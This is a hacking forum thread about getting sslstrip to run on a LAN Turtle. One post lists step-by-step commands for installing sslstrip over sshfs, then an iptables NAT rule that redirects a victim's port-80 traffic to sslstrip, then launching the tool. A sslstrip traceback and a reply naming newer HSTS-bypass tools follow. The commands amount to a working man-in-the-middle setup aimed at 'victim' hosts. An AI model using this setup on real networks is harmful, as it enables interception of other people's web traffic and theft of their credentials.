Jump to content

Recommended Posts

Posted

So I got tcpdump working like a charm (as long as you utilize a sshfs destination so you don't fill up the tiny MBs of onboard), but like any good hacker, I want to strip those pesky ssl's. Browsers have certainly come a long way since moxie blessed us with the fruit of his labors, but its still fun to play around with, despite it being somewhat deprecated. I dug up my old thread on getting sslstrip to work with the pineapple (long before the Amazing Whistlemaster made it a module):

https://forums.hak5.org/index.php?/topic/26759-full-sslstrip-guide/

and everything works great up until the iptables prerouting portion. Can any iptables-fu ninja help me out with the appropriate commands to run to get it to work? Or is this just not possible with the lan turtle? Many thanks!

telot

Posted

I started playing around with this today and thought I had it working... turns out, once I started browsing on the victim host, sslstrip threw a bunch of exception errors. I do not belive the problem was with my iptables though, I think it was with my installation over sshfs. Let me describe what I did to see if I was in the right direction...

1) SSH into turtle and enable, start, and verify SSHFS is operational (mounted at /sshfs)

2) Added a new line at the end of /etc/opkg.conf file.

dest sshfs /sshfs

3) Install sslstrip to mounted sshfs

opkg install --dest sshfs sslstrip

4) link to python2.7 dependencies (where I think my issues are....)

ln -s /sshfs/usr/lib/python2.7/ /usr/lib/python2.7

5) setup init file

touch /sshfs/usr/lib/python2.7/site-packages/zope/__init__.py

6) verify port forwarding is enabled (should be 1). Mine was already enabled by default

cat /proc/sys/net/ipv4/ip_forward

7) setup iptables to redirect traffic. I made sure to explicitly define the interface, maybe this is where you were having problems @telot?

iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j REDIRECT --to-port 6969

8) start sslstrip

sslstrip -l 6969

It will function as normal until a website is requested, then sslstrip throws the following errors

sslstrip 0.9 by Moxie Marlinspike running...
Traceback (most recent call last):
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 48, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/log.py", line 33, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 59, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/site-packages/twisted/python/context.py", line 37, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 139, in _doReadOrWrite

That makes it seem like my forwarding is working, but sslstrip is not...likely due to the sshfs mount... I wonder if the "thou shalt not install kernal modules on USB storage" also applies for SSHFS mounts. ;) - source https://dev.openwrt.org/ticket/10739

Tomorrow I am going to just download the standalone tarball and execute sslstrip without performing an installation and see what happens...

  • 3 months later...
  • 3 weeks later...
Posted

Unless the victim is using Internet Explorer, I don't see the point of having SSL Strip as it is obsolete now. If we could use Delorean, SSL Strip 2 and DNS2Proxy then we would be talking.

  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...